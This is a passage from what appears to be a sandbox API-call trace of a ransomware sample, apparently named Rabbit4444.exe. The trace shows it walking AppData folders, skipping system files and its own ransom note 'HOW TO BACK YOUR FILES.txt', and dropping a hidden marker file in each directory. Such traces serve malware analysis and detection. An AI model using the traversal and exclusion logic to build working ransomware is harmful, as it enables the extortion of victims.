(HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0070.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11b6c8 [0070.363] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x122268 [0070.363] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712cc700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x712cc700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0070.363] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0070.363] lstrcpyW (in: lpString1=0x130ebf4, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0070.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0070.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108760 [0070.363] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x1221e8 [0070.363] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb58b47, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xddb58b47, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xddb58b47, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0070.363] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.363] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.363] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0070.364] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0070.364] lstrcpyW (in: lpString1=0x130ebf4, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0070.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0070.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11b7a8 [0070.364] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122108 [0070.364] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01a8a59, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x765b92ef, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0070.364] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0070.364] lstrcpyW (in: lpString1=0x130ebf4, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0070.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0070.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108838 [0070.364] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122128 [0070.364] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01a8a59, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x765b92ef, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0070.364] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0070.364] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.365] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.366] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.367] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.368] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.368] CloseHandle (hObject=0x29c) returned 1 [0070.368] CloseHandle (hObject=0x228) returned 1 [0070.368] GetCurrentThreadId () returned 0xd98 [0070.368] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0070.368] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState" [0070.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0070.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0070.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState" [0070.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\" [0070.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0070.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.371] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.379] FlushFileBuffers (hFile=0x228) returned 1 [0070.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.395] CloseHandle (hObject=0x228) returned 1 [0070.397] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState") returned 103 [0070.397] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.397] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01a8a59, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf3456b7f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0070.397] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.397] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.397] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.397] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.397] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01a8a59, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf3456b7f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.397] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.397] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.397] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.398] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3456b7f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3456b7f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3456b7f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.398] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.398] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.398] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3456b7f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3456b7f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3456b7f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0070.398] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0070.398] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0070.398] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0070.398] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.399] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.399] CloseHandle (hObject=0x27c) returned 1 [0070.399] CloseHandle (hObject=0x260) returned 1 [0070.399] GetCurrentThreadId () returned 0xd98 [0070.399] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0070.399] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData" [0070.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b7a8 | out: hHeap=0xe0000) returned 1 [0070.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0070.399] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData" [0070.399] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\" [0070.399] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0070.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.404] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.406] FlushFileBuffers (hFile=0x27c) returned 1 [0070.408] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.408] CloseHandle (hObject=0x27c) returned 1 [0070.409] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData") returned 107 [0070.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.409] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb58b47, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xddb58b47, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf34a3450, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0070.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.409] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.409] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.409] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.409] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb58b47, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xddb58b47, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf34a3450, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.409] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.409] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.409] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.409] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.409] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.409] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf34a3450, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf34a3450, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf34a3450, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.409] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.409] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.409] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf34a3450, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf34a3450, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf34a3450, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0070.409] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0070.409] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.411] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.411] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.412] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.412] CloseHandle (hObject=0x29c) returned 1 [0070.413] CloseHandle (hObject=0x27c) returned 1 [0070.413] GetCurrentThreadId () returned 0xd98 [0070.413] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0070.413] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings" [0070.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0070.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0070.413] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings" [0070.413] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\" [0070.413] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0070.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: 